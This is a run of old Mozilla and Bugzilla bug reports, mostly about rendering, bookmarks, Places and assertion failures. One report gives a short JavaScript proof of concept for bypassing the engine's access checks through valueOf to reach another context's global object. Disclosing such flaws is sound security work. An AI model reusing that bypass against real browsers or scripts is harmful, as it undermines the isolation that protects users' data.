User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
It seems that for any two links (<a> tags) separated by a space, contained in
the <caption> tag of a table, the space is not rendered. See the specified URL.
The words 'hello' and 'there' are two different links with a space between them.
Reproducible: Always
Steps to Reproduce:
1. Navigate to http://smurl.us/6
Actual Results:
The caption reads 'hellothere'
Expected Results:
The caption should read 'hello there'
|
|
312,692 | 2,669,043 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051016 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051016 Firefox/1.6a1
appendChild() seems to append the child itself instead of a deep copy of it,
which may lead to the same child being present more than once. See testcase for
an example.
Reproducible: Always
Steps to Reproduce:
1. Run testcase
Actual Results:
Second
Second
Expected Results:
First
Second
|
|
312,695 | 2,669,057 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Display hidden DIV element and set STYLE to this element.
If you change order of this operation, it works fine.
Reproducible: Always
Steps to Reproduce:
Try this code:
<html>
<head>
<script>
onload = function() {
document.getElementById("message").style.display = "block";
document.getElementById("message").innerHTML =
"content<style>#message{color:blue}</style>";
}
</script>
</head>
<body>
<div id="message" style="display:none;"></div>
</body>
</html>
Tested on WinXP and on MacOS X too.
Actual Results:
Firefox displays text "contentcontent".
Expected Results:
Firefox will display text "content".
|
|
312,769 | 2,669,744 |
I noticed today that visiting http://tinderbox.mozilla.org/SeaMonkey caused us
to leak webshells (the last line I get while shutting down is --WEBSHELL
0x86c1268 == 3).
STEPS TO REPRODUCE:
1. Start browser with the URL http://tinderbox.mozilla.org/SeaMonkey/
2. Close browser.
3. Notice the leaks.
I confirmed that I see this both on trunk and the 1.8 branch.
|
|
312,778 | 2,669,833 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
I couldn't find this bug anywhere. Using Thunderbird version 1.6a1 (20051001)
If I type in a sentence, correct one word that has been underlined in red by
rightclicking and selecting appropriate correction, and then hit ctrl+z or
select undo from edit menu, all my text disappears.
Reproducible: Always
Steps to Reproduce:
1. Compose new window
2. Enter "I am a doodlehead" in body
3. Rightclick on "doodlehead" and select "doodle head"
4. Hit ctrl+Z
Actual Results:
Entire body disappears
Expected Results:
Should have reverted to prior spelling.
Upon further research it seems that this problem stems from fundamental
broken-ness of undo, i.e. too little granularity. But for the 10 percent of
users that will ever learn about undo, only about 50 percent of those will learn
about redo, which is the obvious work-around for this bug.
|
|
312,852 | 2,670,324 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Normal behaviour: drag a URL from the navigation bar to the bookmark toolbar;
when you release it, it appears as a bookmark.
However, with the latest two Mac alphas (perhaps older as well), this is
partially broken.
If you drag the URL to the portion of the bookmark toolbar immediately below the
URL space on thenavigation bar, a tooltip appears that states: "Drag and drop
this icon to create a link to this page"
That tooltip blocks the creation of a bookmark in that location. If you release
the URL, it is _not_ added as a bookmark.
This problem is particularly frustrating if you are attempting to add a bookmark
to a folder located in that spot on the bookmark toolbar.
Reproducible: Always
Steps to Reproduce:
1. Drag URL from navigation bar to bookmark toolbar
2. Drag that URL onto the location of the bookmark toolbar that is immediately
below the URL location on the navigation toolbar.
3. Wait briefly for the tooltip "Drag and drop this icon to create a link to
this page" to appear.
4. Release the URL while your cursor is over the tooltip, so that a bookmark
should be created right under the tooltip.
Actual Results:
No bookmark is created.
Expected Results:
A bookmark should be created or the tooltip should move out of the way.
Comment 2 in bug 296057 mentions this problem as well:
<https://bugzilla.mozilla.org/show_bug.cgi?id=296057#c2>
However, bug 296057 describes a different problem and is not a dupe of this bug.
|
|
313,646 | 2,679,203 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
When I create an XMLHttpRequest object and use the open() method with syncronious mode flagged, FF 1.0.x will not fire the "readystatechange" event... FF 1.5b2 simply freezes.
Reproducible: Always
Steps to Reproduce:
1. Visit my testcase http://www.baka.ca/test/sjax.htm
2. Count the number of alert()s that popup.
Actual Results:
The alert() is shown 5 times (for async mode only).
Expected Results:
The alret() should be shown 10 times. 5 times for sync mode, and more 5 times for async mode.
|
|
313,799 | 2,678,032 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051025 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051025 Firefox/1.6a1
Calling a XMLList's child method causes this assertion:
<><t/></>.child(0)
Reproducible: Always
Steps to Reproduce:
Just in case you want a talkback id: TB11087432Y
|
|
314,776 | 2,685,661 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8) Gecko/20051025 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8) Gecko/20051025 Firefox/1.5
There is problem with display hidden DIV element and setting STYLE to this element and than with add this content to HTML code - it will be rendered twice.
Reproducible: Always
Steps to Reproduce:
See and try test cases.
Actual Results:
Content is rendered twice.
Expected Results:
Content is rendered one time.
|
|
314,800 | 2,685,846 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051101 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051101 Firefox/1.6a1
The whole browser exits then i try to exit the popup window that appears then i click on any of the pictures on that side.
Reproducible: Always
Steps to Reproduce:
1.Go to http://dark-tranquillity.nl/cfm/cfm.htm
2.Click on any of the pictures a popup should appear with that specific picture
3.Then exit that popup window
Actual Results:
Firefox exits
Expected Results:
Just the popup window should exit
First experienced with the nightly trunk build from October 31th.
Got 3 installed extensions:
Adblock Plus 0.5.10
Update channel Selector 1.0.1
Adblock Filterset G Updater 0.2.6
|
|
314,986 | 2,687,200 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051103 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051103 Firefox/1.6a1
When you right-click an extension in the extension manager and select the "Visit Home Page" menu item, a new Firefox window gets loaded with an empty bookmark toolbar.
Reproducible: Always
Steps to Reproduce:
1. open the extension manager
2. righlt-click any extension
3. click "Visit Home Page" menu item
Actual Results:
A new Firefox window shows up with an empty Bookmark toolbar
Expected Results:
The new Firefox window should have fully functional bookmarks toolbar
|
|
315,369 | 2,689,819 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20051104 Camino/1.0+
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20051104 Camino/1.0+
The page renders fine in Safari etc. but doesn't show in Camino.
Reproducible: Always
Steps to Reproduce:
1. Open http://www.svenskadator.se/ in Camino.
2.
3.
|
|
322,499 | 2,740,111 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: SpiderMonkey v. 1.6
If you do the following steps in order twice for a runtime:
1) Create new Context
2) Create object in new context with null parent and proto
3) InitStandardClasses with new object as root
it results in the root of object of the second context dependant on the AnyName function from the first context due to JS_InitClass setting the constructor and prototype properties for the second context's AnyName class construction not actually creating a new object.
This is a problem in that it makes it impossible to release all the objects from the second class immediately upon context destruction.
for more details see: http://groups.google.com/group/netscape.public.mozilla.jseng/browse_frm/thread/d34a97ee2a758dac
Reproducible: Always
Steps to Reproduce:
If you do the following steps in order twice for a runtime:
1) Create new Context
2) Create object in new context with null parent and proto
3) InitStandardClasses with new object as root
Now set the root object for the second context to NULL.
Now call JS_GC on the second context.
Actual Results:
with GC_MARK_DEBUG enabled you'll not that the second context's Root object is dependant on a object chain starting from the AnyName function from the first context.
Expected Results:
with GC_MARK_DEBUG enabled you should see that the Root object for the second context has been GC'd.
I've tried in my sandbox moving these two objects to the context and that fixed the problem...however Brendan tells me this will break E4X ptr based comparisons.
I'd put a note in JSRuntime for anyone who does this in the future.
|
|
322,848 | 2,743,524 |
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; de-DE; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)
Build Identifier: Mozilla/5.0 (X11; U; Linux x86_64; de-DE; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)
I've ~1800 products in Bugzilla. Every product has its own security group. So i've ~1800 security groups each assigned to one of the products. In each product only members of the assigned group can enter and edit bugs. MemberControl and OtherControl is mandatory/mandatory. Our employees are via inheritance in all of the 1800 groups, so see all 1800 products and can enter bugs.
When you are in all 1800 groups, Bugzilla gets extremly slow on nearly every page, that lists products. E.g. show_bug.cgi or enter_bug.cgi. On our server hardware (Dual Xeon machine with 2 GB ram) it takes so long, that the browser stops loading the show_bug.cgi page.
After playing around with the code, i can say, that it is the piece of code that checks to which products the current user has access, that slowes down the whole thing. The code executes 1800 times (for every product) a select statement that takes itself on our server ~one second. That are theoretically 30 minutes, but it never runs so long, cause the browser stops loading the page long before. For testing I simply commented out the CanEnterProduct call in the function 'choices' of Bugzilla/Bug.pm. With this, the performance is tolerable, but not ok.
Reproducible: Always
Steps to Reproduce:
|
|
323,052 | 2,745,452 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
While testing the CSS 3 selectors I tried the :empty selector only to find it had matched the body of the page.
Reproducible: Always
Steps to Reproduce:
1. Create a page with content. And use :empty as a selector.
Actual Results:
The BODY element was selected by the selector, (checking in the DOM inspector showed it was the BODY element and not the HEAD or HTML ones).
Expected Results:
The BOSY element should not be matched unless it is empty.
|
|
329,488 | 2,794,916 |
If copy/paste of a bookmark is performed by Places View, an error message will be displayed on JavaScript Console as follows.
Reproducible: Always
Steps to Reproduce:
1.create new profile.(don't select migration)
2.open places view
3.The bookmark of BookmarkToolbar registered by the default is copied.
4.select "Bookmark Menu" and click right pane.
5. select "Paste" on context menu.
Expected Results:
copy/paste does not work.
JavaScript Console message:
Error: uncaught exception: [Exception... "Component returned failure code: 0x80070057 (NS_ERROR_ILLEGAL_VALUE) [nsITreeView.isContainer]" nsresult: "0x80070057 (NS_ERROR_ILLEGAL_VALUE)" location: "JS frame :: chrome://browser/content/places/tree.xml :: get_insertionPoint :: line 333" data: no]
Mac OS X 10.3.9
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20060305 Firefox/1.6a1
|
|
329,638 | 2,796,027 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060202 Fedora/1.0.7-1.2.fc4 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060202 Fedora/1.0.7-1.2.fc4 Firefox/1.0.7
I upgrade from 2.18.4 to Bugzilla 2.20.1 last week and now i have a problem with the new ssl behavior.
We use http/https for connections from intranet and block http via firewall from internet, only https is allowed. But we have customers, who need to connect with http (didn't accept self signed certificates in proxy configuration), so this customer ip is special configured in the firewall to accept connects with http.
Until the upgrade all work fine, but now i can connect the login page with https and if you submit the login data, the submit is send with http, that is blocked by the firewall.
I've try parameter sslbase and ssl with several combinations but nothing works. Either it switch at submit from https to http (ssl=never) or i will be redirected to https even if i start the connection with http (ssl=always or auth).
The right behavior for ssl force redirection = never should be, that i connect with http and stay at http and if i connect with https i stay at https.
There was a similar bug in 2.16.x if i remember correct.
Reproducible: Always
Steps to Reproduce:
1.connect via https (parameters sslbase=https://bugzilla.mydomain.com/;ssl=never)
2.fill out login data and submit
Actual Results:
get redirected to http
Expected Results:
stay at https
|
|
329,892 | 2,797,729 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060308 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060308 Firefox/1.5
I couldn't find exact steps to reproduce but it's very common. Often when adding a new folder or a separator they don't show up until a restart, although they get created, as can be seen in Places. Other times when removing an item it doesn't disappear. When trying to remove it again you get a failed assertion:
ASSERT: Node QI Failed.
Reproducible: Sometimes
Steps to Reproduce:
1. Play around Places Toolbar adding and removing folders and separators.
2. If you can't hit the bug restart and try some more.
|
|
330,006 | 2,798,636 |
I've been noticing Firefox windows end up on different virtual desktops quite often the past few weeks, and I had a nagging suspicion it was related to the changes for bug 295447 (which also caused bug 324348). I finally had a look at the first version of that patch and the discussion there and realized the steps to reproduce, which are something I do reasonably often:
1. switch tabs using Ctrl-PgUp or Ctrl-PgDn
2. really quickly, before the switch happens, switch virtual desktops using
Ctrl-Arrow (that may be a shortcut I configured rather than the default
GNOME one)
It's pretty easy for me to do this fast enough that I'm on a different virtual desktop before the tab switch happens.
I really don't like the look of the patch in bug 295447, for two reasons:
* focus is already overloaded enough; if we need a method to do a raise/present, it should be a separate method. That the DOM 0 backwards compatibility requires that window.focus() do a raise/present in some cases is IMO a quirk that should not be propagated all the way down into the widget code. If the DOM code requires a raise/present, it should do that on its own.
* we shouldn't do a raise/present when switching tabs.
Why do we want that patch -- why should it not be backed out?
Note that I haven't actually yet tested that that patch is the cause of my problems, but I'd be quite surprised if it isn't. I'll try to do that in the morning.
|
|
330,023 | 2,798,713 |
Steps to reproduce:
1. Rightclick on bookmarks folder, choose Properties.
2. Nothing happens.
In case you want to rename the folder for instance.
|
|
330,024 | 2,798,714 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060309 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060309 Firefox/1.5
The right-hand New Folder button in Places window doesn't work. The left-hand does.
Both branch and trunk.
Reproducible: Always
Steps to Reproduce:
|
|
330,238 | 2,800,132 |
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8) Gecko/20060311 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8) Gecko/20060311 Firefox/1.5
Basically the edge of the window slices the buttons in half, everytime.
Also the same in Organise Bookarks.
Reproducible: Always
Steps to Reproduce:
1. Bookmarks -> Right Click on a bookmark -> Properties
2.
3.
Actual Results:
Window opened and buttons were hidden (Partially).
Expected Results:
Window should open and buttons should not be hidden, window size should not cut through the buttons.
|
|
330,332 | 2,800,685 |
Steps to reproduce:
1. Start Firefox without bookmarks and history.
2. Go to Google and do a search for a subject.
3. Visit 50 matches.
4. Open Places and delete each and every entry until there is nothing left.
5. Close Firefox and examine the bookmarks_history.sqlite.
Result: you'll still see lots of recognizable visited sites.
|
|
330,842 | 2,804,640 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060317 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060317 Firefox/1.6a1
I get an assertion failure window as soon as the browser starts. If I click OK a browser window opens. So far the browser appears to be functioning properly otherwise.
Here is the top of the message:
ASSERT: Can't serialize: file doesn't exist!
Stack Trace:
0:ENSURE_WARN(false,Can't serialize: file doesn't exist:, 2147549183)
1:SRCH_ENG_serializeToFile()
2:SRCH_SVC_convertSherlock([object Object],rpmfine)
If you wan't the rest of the stack trace let me know, but I have to type it in from a screenshot.
Reproducible: Always
Steps to Reproduce:
Start browser
|
|
336,601 | 2,846,647 |
js_SafeComputeThis is used in fun_call, fun_apply and array_extra, thus, it is
possible to bypass access checks by calling valueOf() via a local variable.
function a() {
var f = fun.valueOf;
var x = f();
}
a();
var g = fun.valueOf; // global variable
var y = g();
x is the global object that created fun. y is the global object in the current
context.
|
|
336,875 | 2,848,581 |
Steps to reproduce:
1. Install Adblock Plus and go to http://www.nu.nl/
2. Reload
3. Result: no images.
Regression between 1.9a1_2006050513 and 1.9a1_2006050516.
|
|
337,744 | 2,854,093 |
STEPS TO REPRODUCE: On a Unix system, type resource:////home in the URL bar. Or resource://// for that matter.
bsmedberg says this is not by-design.
|
|
337,871 | 2,854,907 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060513 BonEcho/2.0a2
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060513 BonEcho/2.0a2
While editing templates for a forum package I maintain, it became apparent that the page is jumping around when clicking into different textboxes on the form that is generated for this purpose. I have captured the page source for the form data and have determined that it is not the result of CSS styling for the page. I will attach a chunk of code which illustrates the problem.
Reproducible: Always
Steps to Reproduce:
1. Load test code.
2. Click into text boxes in random spots.
3. Observe how the screen jumps around.
Actual Results:
The screen jumps around, often scrolling the spot where the cursor ended up to the edge of the screen.
Expected Results:
The screen should not shift positions while clicking into various spots in the textboxes.
So far this has only been noticed using the Quicksilver Forums package, but may impact other packages which use muiltple text boxed for inputting data in this manner. Test case html does not require administrative login to access.
|
|
342,108 | 2,887,672 |
Link in tab launches first a blank untitled tab, then the tab with the link.
Regression between 1.9a1_2006061914 and 1.9a1_2006061917.
http://bonsai.mozilla.org/cvsquery.cgi?module=PhoenixTinderbox&date=explicit&mindate=2006-06-19+13%3A00&maxdate=2006-06-19+22%3A00
Caused by Bug 337260?
|
|
343,385 | 2,900,165 |
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060630 BonEcho/2.0a3
The proper title for a bookmarklet is no longer shown in the Properties dialog Title bar. The dialog is instead titled 'Properties for "**bm_title**"'.
Steps to reproduce:
1. Create a bookmarklet on the Bookmarks toolbar (e.g. "javascript:alert('hello')")
2. Right click on it and choose Properties.
This regressed between the 2006-06-30-03 and 2006-06-30-18 branch builds, and can also be seen in a current non-places trunk build. The branch checkins are:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&module=PhoenixTinderbox&branch=MOZILLA_1_8_BRANCH&branchtype=match&date=explicit&mindate=2006-06-30+0200&maxdate=2006-06-30+1900
|
|
327,534 | 2,778,948 |
Steps to reproduce:
1. javascript:alert(uneval(<x/>))
Result: "Error: xml is not a function" on JavaScript Console.
Expected: alert the string "<x/>" or something similar.
Even calling uneval on an array *containing* E4X causes this error.
|
|
327,543 | 2,778,990 |
User-Agent: Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060206 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060206 Firefox/1.6a1
if a livemark/rss feed is on the places toolbar, the "livemark" icon is not displayed.
Reproducible: Always
Steps to Reproduce:
1.build Firefox with places enabled
2.run Firefox
3.place RSS/livemark bookmark on places toolbar (or use headlines from default profile)
4.observe livemark button
Actual Results:
no icon is displayed
Expected Results:
livemark icon should be displayed as it is on traditional bookmarks toolbar
tested with default theme from 2006-02-16 trunk.
|
|
328,299 | 2,785,083 |
Maybe this bug is already fixed by another bug but I only had a 17 Feb build to test.
1. Make a new profile and put some bookmarks in it.
2. Run Firefox, open the customize window and put the Feed icon on the Places toolbar.
3. While dragging, or while closing the customize window, or while hovering over the toolbar, you'll see the contents of the Places toolbar disappear. Only the Places icon and the Feed icon are still there.
4. A browser restart will fix that.
|
|
328,821 | 2,789,702 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
If I remove search engines, they come back when I update firefox.
Reproducible: Always
Steps to Reproduce:
1. Remove useless search engines like Yahoo or Answers.com
2. Update Firefox
3. profit
Actual Results:
Useless search engines come back.
Expected Results:
Useless search engines should not come back.
|
|
329,314 | 2,793,678 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060303 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060303 Firefox/1.6a1
Attempting to undo actions in Places using Ctrl+Z results in an error dialog, but the action is still undone.
Reproducible: Always
Steps to Reproduce:
Try to perform an action in places, such as dragging and dropping bookmarks to reorder them. Multiple bookmarks will probably move, even though only one bookmark was selected. If you then hit Ctrl+Z to undo the drag and drop, an error dialog pops up that says:
ASSERT: Invalid Transaction Index
Stack Trace:
0:PTM_undoTransaction()
1:PC_doCommand(cmd_undo)
If you then click Ok, the intended bookmark movement is still undone, while the undesired bookmark movement remains.
This error also pops up when hitting Ctrl+Z when no action was previously taken, but then there is no action to undo.
|
|
333,965 | 2,828,153 |
Steps to reproduce:
1. Open places and type a search term
2. It takes a long time before the whole word appears in the inputfield with cpu usage 100%
3. Firefox hangs for a long time but finally shows the results
4. Now try to wipe out the word pressing Back
5. It takes a long time before the word is gone but there is still a remnant of the search term in the right half of the screen or it does not react at all
I see a similar problem in the popup but there it is even worse; it does not search at all.
|
|
334,516 | 2,831,728 |
BUILD: Current trunk build
STEPS TO REPRODUCE: Not sure. I just got this while starting up; might have to shut down previous time in mid-http-load.
DETAILS: I get:
###!!! ASSERTION: If we have a txn pump, request must be it: '!mTransactionPump || request == mTransactionPump', file ../../../../../mozilla/netwerk/protocol/http/src/nsHttpChannel.cpp, line 3976
With the stack:
#2 0xb781db70 in nsHttpChannel::OnStartRequest (this=0x8bddd58, request=0x8c093d0,
ctxt=0x0) at ../../../../../mozilla/netwerk/protocol/http/src/nsHttpChannel.cpp:3975
#3 0xb774eff7 in nsInputStreamPump::OnStateStart (this=0x8c093d0)
at ../../../../mozilla/netwerk/base/src/nsInputStreamPump.cpp:429
#4 0xb774ee49 in nsInputStreamPump::OnInputStreamReady (this=0x8c093d0,
stream=0x8c0b364) at ../../../../mozilla/netwerk/base/src/nsInputStreamPump.cpp:385
#5 0xb7e06e31 in nsInputStreamReadyEvent::EventHandler (plevent=0x8685b3c)
at ../../../mozilla/xpcom/io/nsStreamUtils.cpp:120
In frame 2 we have:
(gdb) p request
$1 = (nsIRequest *) 0x8c093d0
(gdb) p mCachePump
$2 = {mRawPtr = 0x8c093d0}
(gdb) p mTransactionPump
$3 = {mRawPtr = 0x8bdf1a8}
(gdb) p *(class nsStandardURL*)mURI
...
mData = 0x8bddce0 "http://www.mozilla.org/projects/minefield/minefield-icon.png"
(gdb) p *this
$8 = {<nsHashPropertyBag> = {<nsIWritablePropertyBag> = {<nsIPropertyBag> = {<nsISupports> = {
_vptr.nsISupports = 0xb7869fe8}, <No data fields>}, <No data fields>}, <nsIWritablePropertyBag2> = {<nsIPropertyBag2> = {<nsIPropertyBag> = {<nsISupports> = {
_vptr.nsISupports = 0xb786a190}, <No data fields>}, <No data fields>}, <No data fields>}, mRefCnt = {mValue = 4}, _mOwningThread = {mThread = 0x804a548},
mPropertyHash = {<nsBaseHashtable<nsStringHashKey, nsCOMPtr<nsIVariant>, nsIVariant*>> = {<nsTHashtable<nsBaseHashtableET<nsStringHashKey, nsCOMPtr<nsIVariant> > >> = {
mTable = {ops = 0xb7e99480, data = 0x0, hashShift = 28,
maxAlphaFrac = 192 'À', minAlphaFrac = 64 '@', entrySize = 24,
entryCount = 0, removedCount = 0, generation = 0,
entryStore = 0x8bddee8 ""}}, <No data fields>}, <No data fields>}}, <nsIHttpChannel> = {<nsIChannel> = {<nsIRequest> = {<nsISupports> = {
_vptr.nsISupports = 0xb786a1fc}, <No data fields>}, <No data fields>}, <No data fields>}, <nsIHttpChannelInternal> = {<nsISupports> = {
_vptr.nsISupports = 0xb786a2c4}, <No data fields>}, <nsIStreamListener> = {<nsIRequestObserver> = {<nsISupports> = {
_vptr.nsISupports = 0xb786a2f0}, <No data fields>}, <No data fields>}, <nsICachingChannel> = {<nsISupports> = {
_vptr.nsISupports = 0xb786a310}, <No data fields>}, <nsIUploadChannel> = {<nsISupports> = {
_vptr.nsISupports = 0xb786a344}, <No data fields>}, <nsICacheListener> = {<nsISupports> = {
_vptr.nsISupports = 0xb786a360}, <No data fields>}, <nsIEncodedChannel> = {<nsISupports> = {
_vptr.nsISupports = 0xb786a378}, <No data fields>}, <nsITransportEventSink> = {<nsISupports> = {
_vptr.nsISupports = 0xb786a398}, <No data fields>}, <nsIResumableChannel> = {<nsISupports> = {
_vptr.nsISupports = 0xb786a3b0}, <No data fields>}, <nsISupportsPriority> = {<nsISupports> = {
_vptr.nsISupports = 0xb786a3cc}, <No data fields>}, <nsIProtocolProxyCallback> = {<nsISupports> = {_vptr.nsISupports = 0xb786a3ec}, <No data fields>}, mOriginalURI = {
mRawPtr = 0x8bddbb8}, mURI = {mRawPtr = 0x8bddbb8}, mDocumentURI = {
mRawPtr = 0x8b07050}, mListener = {mRawPtr = 0x8bde1c0},
mListenerContext = {<nsCOMPtr_base> = {mRawPtr = 0x0}, <No data fields>},
mLoadGroup = {mRawPtr = 0x8bde500}, mOwner = {<nsCOMPtr_base> = {
mRawPtr = 0x0}, <No data fields>}, mCallbacks = {mRawPtr = 0x891f6d0},
mProgressSink = {mRawPtr = 0x891f218}, mUploadStream = {mRawPtr = 0x0}, mReferrer = {
mRawPtr = 0x8bde1f8}, mSecurityInfo = {<nsCOMPtr_base> = {
mRawPtr = 0x0}, <No data fields>}, mEventQ = {mRawPtr = 0x80e2d68},
mProxyRequest = {mRawPtr = 0x0}, mRequestHead = {mHeaders = {
mHeaders = {<nsTArray_base> = {static sEmptyHdr = {mLength = 0, mCapacity = 0},
mHdr = 0x8bde2c8}, <No data fields>}}, mMethod = {_val = 0xb78578aa "GET"},
mVersion = 11 '\v', mRequestURI = {<nsCSubstring> = {<nsACString_internal> = {
mVTable = 0xb7e9c6c8,
mData = 0x8bde7b0 "/projects/minefield/minefield-icon.png", mLength = 38,
mFlags = 5}, <No data fields>}, <No data fields>}}, mResponseHead = 0x8bde8b8,
mTransactionPump = {mRawPtr = 0x8bdf1a8}, mTransaction = 0x8bde7f8,
mConnectionInfo = 0x8bde070, mSpec = {<nsCSubstring> = {<nsACString_internal> = {
mVTable = 0xb7e9c6c8,
mData = 0x8bddce0 "http://www.mozilla.org/projects/minefield/minefield-icon.png", mLength = 60, mFlags = 5}, <No data fields>}, <No data fields>}, mLoadFlags = 0,
mStatus = 0, mLogicalOffset = {mValue = 0}, mCaps = 1 '\001', mPriority = 9,
mContentTypeHint = {<nsCSubstring> = {<nsACString_internal> = {mVTable = 0xb7e9c6c8,
mData = 0xb7e91220 "", mLength = 0,
mFlags = 1}, <No data fields>}, <No data fields>},
mContentCharsetHint = {<nsCSubstring> = {<nsACString_internal> = {
mVTable = 0xb7e9c6c8, mData = 0xb7e91220 "", mLength = 0,
mFlags = 1}, <No data fields>}, <No data fields>},
mUserSetCookieHeader = {<nsCSubstring> = {<nsACString_internal> = {
mVTable = 0xb7e9c6c8, mData = 0xb7e91220 "", mLength = 0,
mFlags = 1}, <No data fields>}, <No data fields>}, mCacheEntry = {
mRawPtr = 0x8bde768}, mCachePump = {mRawPtr = 0x8c093d0}, mCachedResponseHead = 0x0,
mCacheAccess = 3, mPostID = 0, mRequestTime = 1145385884,
mProxyAuthContinuationState = 0x0,
mProxyAuthType = {<nsCSubstring> = {<nsACString_internal> = {mVTable = 0xb7e9c6c8,
mData = 0xb7e91220 "", mLength = 0,
mFlags = 1}, <No data fields>}, <No data fields>}, mAuthContinuationState = 0x0,
mAuthType = {<nsCSubstring> = {<nsACString_internal> = {mVTable = 0xb7e9c6c8,
mData = 0xb7e91220 "", mLength = 0,
mFlags = 1}, <No data fields>}, <No data fields>}, mIdent = {mUser = 0x0,
mPass = 0x0, mDomain = 0x0}, mProxyIdent = {mUser = 0x0, mPass = 0x0,
mDomain = 0x0}, mEntityID = {<nsCSubstring> = {<nsACString_internal> = {
mVTable = 0xb7e9c6c8, mData = 0xb7e91220 "", mLength = 0,
mFlags = 1}, <No data fields>}, <No data fields>},
mStartPos = 18446744073709551615, mRedirectionLimit = 20 '\024', mIsPending = 1,
mApplyConversion = 1, mAllowPipelining = 1, mCachedContentIsValid = 1,
mCachedContentIsPartial = 1, mResponseHeadersModified = 0, mCanceled = 0,
mTransactionReplaced = 0, mUploadStreamHasHeaders = 0, mAuthRetryPending = 0,
mSuppressDefensiveAuth = 0, mResuming = 0, mInitedCacheEntry = 0}
|
|
334,944 | 2,835,108 |
